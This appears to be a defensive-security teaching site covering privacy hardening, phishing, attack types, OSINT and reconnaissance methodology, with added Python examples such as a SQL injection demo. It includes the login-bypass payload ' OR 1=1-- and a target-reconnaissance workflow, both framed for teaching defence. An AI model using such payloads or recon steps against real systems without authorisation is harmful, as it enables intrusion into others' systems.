// DEFENSIVE SECURITY
How to Protect Yourself Online
The data on your ReconKit Exposure page is what every website you visit silently collects — with zero warning and no permission required. Here's how to significantly reduce what you expose, starting with the most impactful steps.
The Most Important Steps First
Install uBlock Origin in your browser. It blocks ads, trackers, and fingerprinting scripts. It is the single most impactful thing you can do immediately — free, open source, and takes 30 seconds to set up.
Switch to Firefox or Brave Browser. Both actively resist fingerprinting and tracking. Chrome is the worst offender — it is Google's primary data collection tool disguised as a browser.
Use a password manager — Bitwarden (free), 1Password, or KeePass. Generate a unique random password for every account. This one change eliminates credential stuffing attacks entirely.
Enable two-factor authentication (2FA) everywhere. Use an authenticator app (Google Authenticator, Authy, or Bitwarden) rather than SMS where possible. Even weak 2FA is infinitely better than none.
Use a reputable VPN on public networks — coffee shops, airports, hotels. Mullvad, ProtonVPN, or IVPN. Avoid any free VPN — they sell your data.
Browser Hardening
Warning: Canvas and WebGL fingerprinting cannot be blocked by a VPN. Even behind a VPN, your browser generates a unique identifier from your GPU and fonts. Use Brave or Firefox with Privacy Badger to mitigate this.
Beyond installing a good browser, configure it properly:
Firefox hardening: Set privacy.resistFingerprinting = true in about:config. Install uBlock Origin and Privacy Badger. Change your DNS to 1.1.1.1 or 9.9.9.9 in Settings → Network.
Brave is hardened by default — it blocks fingerprinting, trackers, and ads without any configuration. It also has a built-in VPN and Tor integration.
Network & DNS
Your ISP logs every domain you visit by default. Changing your DNS to a privacy-respecting provider prevents this without any other changes to your setup.
| Provider | DNS Address | Logs? | Notes |
| Cloudflare | 1.1.1.1 | No | Fast, privacy-focused |
| Quad9 | 9.9.9.9 | No | Blocks malicious domains |
| NextDNS | Custom | Optional | Configurable blocklists |
| Your ISP | Default | Yes | Sold to advertisers |
Account Security Checklist
✓ Unique password for every account — check your most important accounts first: email, banking, social media.
✓ 2FA on email — your email is the master key to every other account via password reset.
✓ Check for breaches — use the Breach Check tool or visit haveibeenpwned.com.
✓ Keep software updated — most real-world attacks exploit known, already-patched vulnerabilities.
// SURVEILLANCE MECHANICS
How Websites Track You
Most people know about cookies. But modern tracking is layered — websites use multiple techniques simultaneously, many of which are invisible and survive cookie deletion, VPN use, and private browsing. ReconKit demonstrates these in real time.
Layer 1 — IP Address
Your IP address is sent with every request you make. No permission, no opt-out. It reveals your approximate city, ISP, and sometimes your building or employer. Law enforcement can subpoena ISPs to tie an IP to an identity with a timestamp.
VPNs mask your real IP — but shift trust to the VPN provider. If they keep logs, your privacy is only as good as their policies.
Layer 2 — Browser Fingerprinting
Your browser leaks dozens of data points with every page visit — screen resolution, installed fonts, GPU model, timezone, language settings, and more. Combined, these create a unique "fingerprint" that identifies you even after clearing cookies.
| Signal | What it reveals | Blockable? |
| Canvas fingerprint | GPU rendering — uniquely identifies your device | Partial |
| WebGL fingerprint | GPU vendor and model | Partial |
| Audio fingerprint | Sound hardware characteristics | Partial |
| Installed fonts | OS, region, installed software | Yes (Brave) |
| Screen resolution | Device type and monitor setup | No |
| Timezone | Approximate location | No |
| User agent | OS, browser, and version | Spoofable |
| Battery level | Weak cross-site identifier | Deprecated |
Layer 3 — Third-Party Cookies & Trackers
When a website embeds a Google Analytics script, a Facebook Like button, or a Twitter widget, those third parties set cookies that follow you across every site where those scripts appear — which is most of the commercial web. This is how Facebook knows what you searched for on a competitor's site.
Layer 4 — WebRTC Leaks
WebRTC is a real-time communication protocol built into browsers for video calls. Even when you're behind a VPN, browsers can reveal your real local and public IP address through WebRTC to any page that asks. ReconKit's Exposure tab checks for this specifically.
This is why VPN alone is insufficient. A site can fingerprint your GPU, read your WebRTC IPs, and identify you across sessions — even if your VPN IP changes. You need fingerprint resistance, not just IP masking.
Layer 5 — Behavioural Biometrics
Advanced tracking captures how you move your mouse, how fast you type, scrolling patterns, and touch pressure on mobile. These patterns are highly unique and cannot be blocked by any browser extension. This is used by fraud detection systems and increasingly by ad networks.
// NETWORK PRIVACY
VPNs Explained
A VPN (Virtual Private Network) encrypts your internet traffic and routes it through a server in another location — masking your real IP from the websites you visit and encrypting traffic from your ISP. Understanding what VPNs actually protect (and don't) is critical.
What a VPN Does
✓ Hides your IP address from websites and services you visit.
✓ Encrypts your traffic from your ISP — they see you connected to a VPN, not what you browse.
✓ Protects you on public WiFi — prevents MITM attacks on open networks.
✓ Bypasses geographic restrictions — access region-locked content.
What a VPN Does NOT Do
✗ Does not stop browser fingerprinting — canvas, WebGL, and font fingerprints are unaffected.
✗ Does not stop cookies already set on your device.
✗ Does not hide you from Google/Facebook when you're logged in — they track by account.
✗ Does not stop WebRTC leaks unless your browser is configured to prevent them.
✗ Does not make you anonymous — it shifts trust from your ISP to your VPN provider.
Choosing a VPN
The VPN market is full of providers with questionable privacy practices. Many free VPNs are funded by selling user data — the opposite of their stated purpose. The criteria that matter:
| Provider | Logs? | Jurisdiction | Price | Audited? |
| Mullvad | No | Sweden | €5/mo | Yes |
| ProtonVPN | No | Switzerland | Free–€8/mo | Yes |
| IVPN | No | Gibraltar | $6/mo | Yes |
| ExpressVPN | Claims no | British Virgin Islands | $8/mo | Partial |
| NordVPN | Claims no | Panama | $4/mo | Partial |
| Free VPNs | Yes | Various | Free | No |
Mullvad accepts cash and cryptocurrency and doesn't require an email address to sign up. If anonymity matters to you, this is the most serious option available.
VPN vs Tor
Tor routes your traffic through multiple encrypted relays, making it much harder to trace. It's slower than a VPN and not suitable for streaming, but provides stronger anonymity for sensitive browsing. For most people, a trusted VPN is the right tool — Tor is for high-stakes situations where anonymity is critical.
// AUTHENTICATION SECURITY
Password Security
Passwords remain the primary authentication mechanism for most systems. Understanding how they're attacked helps you build habits that are actually effective — not just security theatre.
How Passwords Are Attacked
| Attack | How it works | Defence |
| Credential stuffing | Leaked password lists from old breaches tried on other services | Unique passwords everywhere |
| Brute force | Every possible combination tried sequentially | Length — 16+ characters |
| Dictionary attack | Common words and patterns tried first | Random characters or passphrase |
| Phishing | Fake login page captures your credentials | 2FA + check the URL |
| Keylogger | Malware captures keystrokes | Keep OS updated, use AV |
Length Beats Complexity
A 20-character passphrase of random words is dramatically stronger than Tr0ub@dor!. Length exponentially increases brute-force time. A 16-character random password takes centuries to crack. An 8-character complex password can fall in hours with modern GPUs.
The Password Manager Case
You cannot memorise unique 20-character random passwords for 200 accounts. You don't need to. A password manager generates and stores them. You need one strong master password — make it a long passphrase you'll remember.
Bitwarden — free, open source, audited, works everywhere. Best choice for most people.
1Password — polished, team/family features, $3/mo.
KeePass — local only, no cloud, maximum control for technical users.
Two-Factor Authentication
2FA means a stolen password alone cannot access your account. The second factor (an authenticator app code) expires every 30 seconds. Even if attackers have your password from a breach, they cannot log in without physical access to your phone.
SMS-based 2FA is weak — SIM swapping attacks can intercept text messages. Use an authenticator app (Authy, Google Authenticator, or the Bitwarden built-in authenticator) for important accounts.
// SOCIAL ENGINEERING
Recognising Phishing Attacks
Phishing is the most common attack vector globally — not because it's sophisticated, but because it works. It exploits human psychology rather than technical vulnerabilities. No firewall protects against a person willingly entering their credentials on a fake page.
Types of Phishing
| Type | Target | Method |
| Email phishing | Mass — anyone | Fake "your account has been compromised" emails with malicious links |
| Spear phishing | Specific individual | Personalised attack using researched information about you |
| Whaling | Executives / high value | CEO fraud — impersonating leadership to authorise wire transfers |
| Smishing | Mobile users | Fake SMS from "your bank" or delivery service |
| Vishing | Phone users | Caller impersonates tech support, bank, or government |
| Clone phishing | Email recipients | Exact copy of legitimate email with malicious links substituted |
Red Flags to Look For
Check the actual domain carefully — paypa1.com, paypai.com, paypal.com.evil.net are not PayPal. The legitimate domain is always the part immediately before .com, .org, etc. Hover over any link before clicking to see the real destination.
Urgency is the primary weapon. "Your account will be suspended in 24 hours" — "Verify now or lose access" — "Immediate action required." Urgency bypasses critical thinking. Real companies don't threaten immediate consequences for routine security checks. If it feels urgent, slow down.
Other red flags: requests for credentials via email, attachments you didn't expect, mismatched sender addresses (display name vs actual address), generic greetings ("Dear Customer" instead of your name), and requests to pay by gift card or wire transfer.
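The "part immediately before .com, .org, etc." rule above is exactly what browsers compute as the registrable domain. The following is an added example (not ReconKit's code) that applies that rule to a link and lists the other red flags a link itself can carry; the public-suffix set is a small constructed subset of the real Public Suffix List, and the paypa1/paypai/evil.net hostnames are the page's own illustrations.

```python
from typing import List, Optional
from urllib.parse import urlparse

# Constructed subset of the Public Suffix List (publicsuffix.org). The real list,
# which browsers ship, has thousands of entries; this is enough for the examples.
PUBLIC_SUFFIXES = {"com", "org", "net", "co.uk", "co.ke"}


def _parse(url: str):
    # A bare hostname such as "paypa1.com" needs a scheme before urlparse sees it as a host.
    return urlparse(url if "://" in url else "https://" + url)


def registrable_domain(url: str) -> Optional[str]:
    """The domain that actually controls the page: the label immediately before the
    public suffix (.com, .co.uk, ...) plus that suffix. Subdomains in front, user@
    prefixes, ports and paths are ignored, which is how a browser reads the URL too."""
    host = _parse(url).hostname
    if not host:
        return None
    labels = host.rstrip(".").lower().split(".")
    for n in (2, 1):  # longest suffix first, so "co.uk" wins over "uk"
        if len(labels) > n and ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[-(n + 1):])
    return None


def link_red_flags(url: str, expected_domain: str) -> List[str]:
    """Reasons a link claiming to be `expected_domain` should not be trusted."""
    parsed = _parse(url)
    host = (parsed.hostname or "").lower()
    flags: List[str] = []
    actual = registrable_domain(url)
    if actual != expected_domain:
        flags.append(f"registrable domain is {actual!r}, not {expected_domain!r}")
    if parsed.username is not None:
        flags.append("user@ prefix: the real host is whatever follows the @")
    if any(label.startswith("xn--") for label in host.split(".")):
        flags.append("punycode label: possible look-alike (homograph) domain")
    if host.replace(".", "").isdigit():
        flags.append("raw IP address instead of a hostname")
    if parsed.scheme == "http":
        flags.append("plain http, no TLS")
    return flags


if __name__ == "__main__":
    for link in ("https://www.paypal.com/signin", "paypa1.com", "https://paypai.com/login",
                 "https://paypal.com.evil.net/login", "http://paypal.com@192.0.2.1/"):
        print(f"{link:40} -> {registrable_domain(link)!r:16} {link_red_flags(link, 'paypal.com')}")
```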
If You Clicked a Phishing Link
Do not enter any information. Close the tab immediately.
If you entered credentials: change your password on the real site immediately, then enable 2FA if you haven't.
If you downloaded a file: do not open it. Run a malware scan. Consider a system restore if you did open it.
Check your email for forwarding rules — phishers often set rules to silently forward your email to themselves.
Report the phishing email to your email provider and to the impersonated organisation.
// THREAT LANDSCAPE
Common Attack Types
Understanding attack vectors is the foundation of defence. You cannot protect against threats you don't understand. These are the most common techniques used against individuals and organisations.
Network Attacks
Man-in-the-Middle (MITM). The attacker positions themselves between you and the server, intercepting and potentially modifying traffic. Most dangerous on public WiFi. HTTPS and VPNs mitigate this — always verify the padlock and certificate when handling sensitive data.
DNS Spoofing / Poisoning. Corrupted DNS responses redirect users to attacker-controlled servers even when they type the correct domain. Use DNSSEC-supporting resolvers and verify HTTPS certificates.
Web Application Attacks
SQL Injection. Attacker inserts malicious SQL into a web form input, manipulating the database. Example: entering ' OR 1=1-- in a login form to bypass authentication. Prevented by parameterised queries and input sanitisation.
Cross-Site Scripting (XSS). Malicious JavaScript injected into a legitimate page runs in victims' browsers — stealing session cookies, redirecting users, or capturing keystrokes. Prevented by Content Security Policy headers and output encoding.
Cross-Site Request Forgery (CSRF). A malicious page secretly sends requests to a site where the victim is authenticated. The site cannot distinguish the legitimate user from the attack. Prevented by CSRF tokens and SameSite cookie attributes.
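To make the SQL injection entry concrete, the following is an added example (not ReconKit's code) that shows the string-built query the page's ' OR 1=1-- input defeats, next to the parameterised version that treats the same input as plain data. It uses Python's built-in sqlite3 with an in-memory table and a constructed placeholder hash.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """In-memory users table with one constructed row. A real system stores a slow
    password hash (bcrypt/argon2) and compares with a verifier, never the password itself."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'argon2-hash-placeholder')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    """Input spliced into the SQL text, so a quote in the input changes the query's meaning.
    With username = "' OR 1=1--" the WHERE clause becomes
        username = '' OR 1=1--' AND password_hash = '...'
    and everything after -- is a comment, so the row check is skipped."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password_hash = '{password_hash}'")
    return conn.execute(sql).fetchone() is not None


def login_parameterised(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    """Placeholders keep the input as a bound value: the database driver never lets it
    become SQL syntax, so "' OR 1=1--" is just a username nobody has."""
    sql = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(sql, (username, password_hash)).fetchone() is not None


if __name__ == "__main__":
    payload = "' OR 1=1--"
    print("vulnerable, injected   :", login_vulnerable(make_demo_db(), payload, "x"))
    print("parameterised, injected:", login_parameterised(make_demo_db(), payload, "x"))
    print("parameterised, alice   :", login_parameterised(make_demo_db(), "alice", "argon2-hash-placeholder"))
```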
Endpoint Attacks
Ransomware. Malware encrypts all your files and demands payment for the decryption key. Spreads through phishing emails, malicious downloads, and unpatched vulnerabilities. Defence: regular offline backups, software updates, and email vigilance.
Credential Stuffing. Using lists of leaked username/password pairs from breaches to try other services. Works because most people reuse passwords. Defence: unique passwords + 2FA everywhere.
Social Engineering
Manipulating people rather than systems — pretexting, impersonation, urgency tactics. No technical control fully defends against a sufficiently convincing human attacker. Defences are organisational: verification procedures, scepticism about unsolicited contact, and training.
// OPEN SOURCE INTELLIGENCE
Introduction to OSINT
OSINT — Open Source Intelligence — is the practice of collecting and analysing information from publicly available sources to produce actionable intelligence. Everything ReconKit does is OSINT. It is legal, ethical (when used appropriately), and a foundational skill in cybersecurity.
What Counts as "Open Source"?
Open source does not mean just code repositories. In an intelligence context, it means anything publicly available without requiring unauthorised access:
Public sources include: websites and web archives, social media profiles, DNS records, WHOIS registration data, SSL certificate logs (crt.sh), job postings, court records, company filings, academic publications, code repositories, news articles, and any data indexed by search engines.
OSINT in Cybersecurity
| Use Case | Who Uses It | Purpose |
| Reconnaissance | Penetration testers | Map attack surface before an authorised test |
| Threat intelligence | SOC analysts | Identify indicators of compromise and attacker infrastructure |
| Incident response | IR teams | Trace attacker origins and identify compromised assets |
| Digital forensics | Investigators | Build evidence chains from public data |
| Red teaming | Red teams | Simulate realistic attacker behaviour against an organisation |
| Brand monitoring | Security teams | Detect phishing domains and data leaks referencing the organisation |
The OSINT Framework
OSINT Framework (osintframework.com) is a community-maintained visual map of OSINT sources and tools, organised by data type. It's an essential reference for understanding what kinds of data are publicly available and how to find them systematically.
Legal and Ethical Boundaries
OSINT does not mean anything goes. Even with public data: aggregating personal information about private individuals for harassment is illegal in most jurisdictions. Accessing data behind a login — even if you have credentials — crosses into computer misuse law. The Computer Misuse Act (UK), CFAA (US), and Kenya's Computer Misuse and Cybercrimes Act all apply.
The ethical test is intent and consent. Researching your own exposure, conducting authorised penetration tests, or working in legitimate threat intelligence are all lawful. Researching individuals without their knowledge for personal or commercial advantage is a grey area that often crosses legal lines.
// INTELLIGENCE METHODOLOGY
Reconnaissance Methodology
Effective reconnaissance follows a structured methodology — not just "Google things and see what appears." A systematic approach ensures you build a comprehensive picture of an organisation's attack surface without missing critical elements.
The Reconnaissance Kill Chain
Define scope. What is the target? What's in scope (domains, IPs, subsidiaries) vs out of scope? Document this before starting. Never operate beyond agreed scope in an authorised engagement.
Passive reconnaissance. Gather information without touching the target's infrastructure. DNS records, WHOIS, certificate logs, Shodan, Google Dorks, social media, job postings. Target is unaware.
Infrastructure mapping. Identify IP ranges, ASNs, hosting providers, CDN usage, and cloud infrastructure. Tools: Hurricane Electric BGP toolkit, Shodan, Censys.
Subdomain enumeration. Discover subdomains using certificate transparency (crt.sh), DNS brute forcing, and passive DNS databases. Subdomains often reveal development environments, admin panels, and legacy systems.
Technology fingerprinting. Identify web frameworks, CMS platforms, server software, JavaScript libraries, and analytics tools. Tools: Wappalyzer, WhatWeb, BuiltWith.
People & credentials. Identify key personnel via LinkedIn, breach databases (HaveIBeenPwned, DeHashed), GitHub commits, email pattern discovery. Social engineering starts here.
Document and analyse. Consolidate findings into a structured report. Identify the most promising attack paths. Never act on findings without proper authorisation.
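The subdomain-enumeration step above leans on certificate transparency, and crt.sh's JSON output is messier than it looks: one entry can carry several names, wildcards, and mixed case, and old certificates point at exactly the legacy systems the step mentions. The following is an added example (not ReconKit's code) that turns a crt.sh-style response into a hostname inventory and flags hosts whose newest certificate has expired; the JSON is a constructed sample using crt.sh's field names, suitable for auditing your own domain's certificate history.

```python
import json
from datetime import datetime, timezone
from typing import Dict, List

# Constructed sample shaped like crt.sh's JSON output for a query such as
#   https://crt.sh/?q=example.com&output=json
# Field names are the ones crt.sh emits; the values are invented for this example.
SAMPLE_CRTSH_JSON = r"""[
  {"id": 1, "issuer_name": "C=US, O=Let's Encrypt, CN=R3",
   "common_name": "www.example.com", "name_value": "example.com\nwww.example.com",
   "not_before": "2024-01-01T00:00:00", "not_after": "2024-03-31T23:59:59"},
  {"id": 2, "issuer_name": "C=US, O=Let's Encrypt, CN=R3",
   "common_name": "*.dev.example.com", "name_value": "*.dev.example.com\nstaging.example.com",
   "not_before": "2024-02-01T00:00:00", "not_after": "2024-05-01T23:59:59"},
  {"id": 3, "issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA",
   "common_name": "legacy-admin.example.com", "name_value": "legacy-admin.example.com\nVPN.Example.com",
   "not_before": "2019-06-01T00:00:00", "not_after": "2020-06-01T23:59:59"},
  {"id": 4, "issuer_name": "C=US, O=Let's Encrypt, CN=R3",
   "common_name": "notexample.com", "name_value": "notexample.com",
   "not_before": "2024-01-01T00:00:00", "not_after": "2024-03-31T23:59:59"}
]"""


def parse_crtsh(json_text: str, root: str) -> Dict[str, datetime]:
    """Map every hostname under `root` to the latest not_after seen for it.
    Splits multi-name entries (newline separated), strips wildcard prefixes,
    normalises case, and drops names that merely contain the root as a substring."""
    root = root.lower()
    latest: Dict[str, datetime] = {}
    for entry in json.loads(json_text):
        expires = datetime.fromisoformat(entry["not_after"]).replace(tzinfo=timezone.utc)
        for raw in entry["name_value"].split("\n"):
            name = raw.strip().lower()
            if name.startswith("*."):
                name = name[2:]                      # *.dev.example.com -> dev.example.com
            if name != root and not name.endswith("." + root):
                continue                             # e.g. notexample.com
            if name not in latest or expires > latest[name]:
                latest[name] = expires
    return latest


def stale_hosts(latest: Dict[str, datetime], as_of: str) -> List[str]:
    """Hostnames whose newest certificate had already expired on `as_of` (ISO date):
    candidates for forgotten or decommissioned systems that deserve a look."""
    now = datetime.fromisoformat(as_of).replace(tzinfo=timezone.utc)
    return sorted(host for host, exp in latest.items() if exp < now)


if __name__ == "__main__":
    inventory = parse_crtsh(SAMPLE_CRTSH_JSON, "example.com")
    for host in sorted(inventory):
        print(f"{host:28} latest cert expires {inventory[host]:%Y-%m-%d}")
    print("stale:", stale_hosts(inventory, "2024-03-01"))
```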
Key OSINT Data Sources for Recon
| Source | URL | What it reveals |
| crt.sh | crt.sh | All SSL certs issued — reveals subdomains |
| Shodan | shodan.io | Internet-connected devices, open ports, banners |
| Censys | search.censys.io | Similar to Shodan, different scan coverage |
| VirusTotal | virustotal.com | Domain/IP reputation, passive DNS |
| SecurityTrails | securitytrails.com | Historical DNS, subdomain discovery |
| OSINT Framework | osintframework.com | Comprehensive source map |
| Google Dorks | google.com | Exposed files, admin panels via search operators |
| Wayback Machine | web.archive.org | Historical site versions, old endpoints |
// RECON TECHNIQUES
Passive vs Active Reconnaissance
The distinction between passive and active reconnaissance is not just technical — it has legal and ethical implications. Understanding when you're crossing from passive observation into active probing is fundamental to operating lawfully.
Passive Reconnaissance
Passive recon gathers information without directly interacting with the target's systems. The target cannot detect your activity because you never touch their infrastructure.
Examples of passive recon:
— Searching Google for target information
— Reading WHOIS registration records
— Querying crt.sh for SSL certificates
— Searching Shodan (data already indexed)
— Reading the target's public website
— Searching LinkedIn for employees
— Checking HaveIBeenPwned for breached emails
— Reviewing GitHub for accidentally committed secrets
Passive recon is almost universally legal. You're consuming publicly available data through normal channels.
Active Reconnaissance
Active recon involves directly probing the target's systems. You generate traffic that hits their servers and can potentially be detected and logged.
Examples of active recon:
— Port scanning (Nmap) against their IP ranges
— DNS zone transfer attempts
— Web crawling their application
— Sending requests to discover hidden paths
— Banner grabbing from their services
— Fuzzing web forms or APIs
— Attempting authentication against login pages
Active recon without explicit written authorisation is illegal in most jurisdictions — including Kenya (Computer Misuse and Cybercrimes Act 2018), UK (Computer Misuse Act), and US (CFAA). Even if your intent is benign, unauthorised port scanning constitutes an offence in most countries. Always have written scope and authorisation.
The Grey Zone
Some techniques sit between passive and active. Visiting a public website generates server logs — is that active? Using Shodan's already-indexed data is passive, but Shodan scanning your target on demand is active. Generally: if you generate new traffic to their systems, it's active regardless of what tool you use.
ReconKit and This Distinction
ReconKit deliberately uses only passive techniques and public third-party APIs. The Domain, DNS, SSL, and WHOIS tools query existing databases — not the target directly. This means ReconKit is safe to use for research without risk of generating unauthorised traffic to target systems.
// IDENTITY EXPOSURE
Digital Footprinting
Your digital footprint is the total body of data that exists about you online — some you created deliberately, much you left without realising. Understanding your own footprint is the first step in both protecting your privacy and understanding how attackers profile targets.
Active vs Passive Footprint
| Type | Examples | Control? |
| Active | Social media posts, forum comments, blog articles, GitHub commits, LinkedIn profile | Partial — you created it, you can delete it (mostly) |
| Passive | Server logs, tracking pixels, advertising profiles, data broker records, WHOIS registration, surveillance camera footage | Minimal — collected without your action |
What a Skilled OSINT Analyst Can Find About You
Given just your email address or username, an experienced analyst can typically: identify your real name, find all social media profiles, approximate your location from geo-tagged posts, identify your employer and job title, find your phone number from data broker sites, identify your approximate income from public records, and potentially find your home address. This is not hypothetical — it's routine in investigations.
Reducing Your Footprint
Google yourself — and your email addresses, phone numbers, and usernames. Use site-specific operators: site:linkedin.com "your name"
Opt out of data brokers — Spokeo, WhitePages, BeenVerified, Intelius all have opt-out forms. It's tedious but effective. Services like DeleteMe automate this.
Review your social media privacy settings. Default settings on most platforms are maximally public. Audit what's visible to non-connections.
Remove geolocation data from photos before posting. Modern smartphones embed GPS coordinates in EXIF metadata. Tools like ExifTool can strip this.
Use separate emails for different purposes — one for finance, one for social, one for shopping, one for throwaway registrations. Proton Mail for sensitive communication.
// ETHICS & PRACTICE
Responsible Disclosure
If you find a security vulnerability in someone else's system — a website, application, or service — responsible disclosure is the ethical and increasingly legally expected way to handle it. This is distinct from both doing nothing and from exploiting the vulnerability.
The Core Principle
Give the affected organisation a reasonable opportunity to fix the vulnerability before making it public. This balances the public's right to know about security issues against the harm that would come from immediate public disclosure while the vulnerability is still exploitable.
The Responsible Disclosure Process
Document the vulnerability thoroughly. Note the affected URL or component, the steps to reproduce, the potential impact, and proof-of-concept evidence. Do not exploit further than necessary to demonstrate the issue.
Find the right contact. Look for a security.txt file at domain.com/security.txt, a bug bounty programme on HackerOne or Bugcrowd, or a security@ email address. Many organisations have published vulnerability disclosure policies.
Report clearly and professionally. Include all documentation. State that you're reporting in good faith and are not demanding payment. Give a reasonable timeline — 90 days is the industry standard established by Google Project Zero.
Wait for acknowledgement and patch. Track the deadline. Most organisations will respond and fix within 90 days if they take security seriously. Some will offer a reward (bug bounty) even without a formal programme.
Disclose publicly after the deadline. If the organisation has not patched after 90 days and is not communicating, coordinated disclosure to a CVE database or security researcher community is appropriate. Always err on the side of delay if there's genuine ongoing remediation effort.
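The security.txt file mentioned in the "find the right contact" step has a defined format (RFC 9116: Contact is required, Expires must appear exactly once, and the standard location is /.well-known/security.txt). The following is an added example (not ReconKit's code) that parses such a file and reports the problems a reporter, or the site owner publishing it, would want to catch; the file contents are a constructed sample.

```python
from datetime import datetime, timezone
from typing import Dict, List

# Constructed example of a security.txt in RFC 9116 format (not from any real site).
SAMPLE_SECURITY_TXT = """\
# Vulnerability disclosure contact for example.com
Contact: mailto:security@example.com
Contact: https://example.com/report-a-vulnerability
Expires: 2025-12-31T23:59:59Z
Encryption: https://example.com/pgp-key.txt
Policy: https://example.com/security-policy
Preferred-Languages: en, sw
"""


def parse_security_txt(text: str) -> Dict[str, List[str]]:
    """Field name (lower-cased) -> list of values; comments and blank lines are skipped.
    Only the first colon separates name from value, so 'mailto:' URIs survive intact."""
    fields: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        name, value = line.split(":", 1)
        fields.setdefault(name.strip().lower(), []).append(value.strip())
    return fields


def security_txt_problems(text: str, as_of: str) -> List[str]:
    """Checks against RFC 9116: a usable Contact URI, exactly one Expires, and that the
    file has not gone stale as of `as_of` (ISO date). An expired file means the listed
    contacts may no longer be monitored, so a report could go unread."""
    fields = parse_security_txt(text)
    now = datetime.fromisoformat(as_of).replace(tzinfo=timezone.utc)
    problems: List[str] = []
    contacts = fields.get("contact", [])
    if not contacts:
        problems.append("no Contact field")
    for c in contacts:
        if not c.startswith(("mailto:", "https://", "tel:")):
            problems.append(f"Contact is not a mailto:/https://tel: URI: {c}")
    expires = fields.get("expires", [])
    if len(expires) != 1:
        problems.append("Expires must appear exactly once")
    else:
        try:
            when = datetime.fromisoformat(expires[0].replace("Z", "+00:00"))
            if when.tzinfo is None:
                when = when.replace(tzinfo=timezone.utc)
            if when < now:
                problems.append(f"Expires ({expires[0]}) is in the past; treat contacts as unverified")
        except ValueError:
            problems.append(f"Expires is not an ISO 8601 timestamp: {expires[0]}")
    return problems


if __name__ == "__main__":
    print(parse_security_txt(SAMPLE_SECURITY_TXT))
    print("problems as of 2025-06-01:", security_txt_problems(SAMPLE_SECURITY_TXT, "2025-06-01"))
    print("problems as of 2026-06-01:", security_txt_problems(SAMPLE_SECURITY_TXT, "2026-06-01"))
```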
Bug Bounty Programmes
Many organisations pay researchers for finding vulnerabilities through formal bug bounty programmes. Platforms like HackerOne and Bugcrowd host these programmes and provide clear rules of engagement, payment structures, and legal protection for researchers operating within scope.
Bug bounty as a career path: Top researchers earn six figures annually from bug bounties alone. The top HackerOne researchers have earned over $1 million. This is a legitimate and growing career path in cybersecurity that requires the same skills as penetration testing — ethical hacking skills you can develop on platforms like TryHackMe, HackTheBox, and CTF competitions.
What Not to Do
Never:
— Access, copy, or exfiltrate data beyond what's necessary to prove the vulnerability.
— Demand payment before reporting.
— Publicly disclose without giving the organisation a reasonable time to respond.
— Continue testing after you've found and documented the vulnerability.
— Use the vulnerability for any personal gain.
These actions convert ethical disclosure into criminal activity.
// CAREER DEVELOPMENT
Cybersecurity Certification Roadmap
Certifications in cybersecurity serve two purposes: structured learning and market signalling to employers. The right path depends on which specialisation you're targeting. Here's an honest, opinionated guide to the certifications that actually move the needle.
The Foundation Layer — Start Here
| Cert | Provider | Cost | Value |
| CompTIA Security+ | CompTIA | ~$400 | Global baseline. Required or preferred on most entry-level job postings. Do this first. |
| Google Cybersecurity Cert | Coursera | ~$50/mo | Practical, builds portfolio projects, well-regarded for beginners. Good supplement. |
| CompTIA Network+ | CompTIA | ~$350 | Useful if you lack networking fundamentals. Skip if you already understand TCP/IP, routing, subnetting. |
Specialisation Tracks
After Security+, choose your lane. The three main paths in cybersecurity employment:
Track A — Security Analyst (Blue Team)
Monitoring, threat detection, incident response. Best combined with data science skills.
| Cert | Cost | Notes |
| CompTIA CySA+ | ~$400 | Security analyst focused, high employer recognition |
| Splunk Core Certified User | Free training + ~$130 exam | SIEM tool used by most SOCs globally — very practical |
| Microsoft SC-200 | ~$165 | Security Operations Analyst using Microsoft Sentinel |
| CISSP | ~$700 | Senior/management level. Requires 5 years experience. Long-term goal. |
Track B — Cloud Security
Fastest-growing segment. Security skills + cloud knowledge = premium salary.
| Cert | Cost | Notes |
| Microsoft AZ-900 | ~$165 | Azure fundamentals — baseline before security specialisation |
| Microsoft AZ-500 | ~$165 | Azure Security Engineer. Highly valued in UK/EU markets. |
| AWS Security Specialty | ~$300 | For AWS environments — strong in US market |
| SC-100 | ~$165 | Microsoft Cybersecurity Architect — senior level |
Track C — Penetration Testing (Red Team)
The most visible path. Hardest to enter without experience but highest earning ceiling.
| Cert | Cost | Notes |
| eJPT (eLearnSecurity) | ~$200 | Good entry point — practical exam, affordable, respected |
| CEH (EC-Council) | ~$1,200 | Known brand, especially in UK/Middle East. More theoretical than OSCP. |
| OSCP (Offensive Security) | ~$1,500 | The gold standard. 24-hour practical exam. Opens senior roles internationally. Work toward this. |
| CRTO (Red Team Ops) | ~$500 | Cobalt Strike, C2 infrastructure — advanced red team operations |
Free Practice Platforms
TryHackMe — beginner-friendly, guided learning paths, browser-based. Start here.
HackTheBox — more advanced, real CTF-style machines. Build your public profile.
PicoCTF — beginner CTF, university-run, year-round challenges.
CTFtime.org — calendar of all active CTF competitions globally. Participate and document wins.
// REFERENCE
Security Glossary
A working vocabulary of cybersecurity terms. Understanding these precisely matters — imprecise language leads to imprecise thinking about security.
ASN — Autonomous System Number
A unique identifier assigned to a network operator (ISP, cloud provider, university) that controls a range of IP addresses. Used in routing and threat intelligence to identify network ownership.
CSRF — Cross-Site Request Forgery
Attack that tricks a victim's browser into making unintended requests to a site where they're authenticated. Prevented by CSRF tokens and SameSite cookie policies.
CVE — Common Vulnerabilities and Exposures
A public dictionary of known security vulnerabilities, each assigned a unique ID (e.g., CVE-2021-44228). The standard way to reference specific vulnerabilities across tools and organisations.
DNS — Domain Name System
The internet's address book. Translates human-readable domain names (google.com) into IP addresses computers use to route traffic. DNS queries reveal your browsing history to your ISP by default.
DMARC / DKIM / SPF
Email authentication standards. SPF specifies which servers can send email for a domain. DKIM cryptographically signs emails. DMARC tells receiving servers what to do with emails that fail those checks. Missing these enables email spoofing.
Firewall
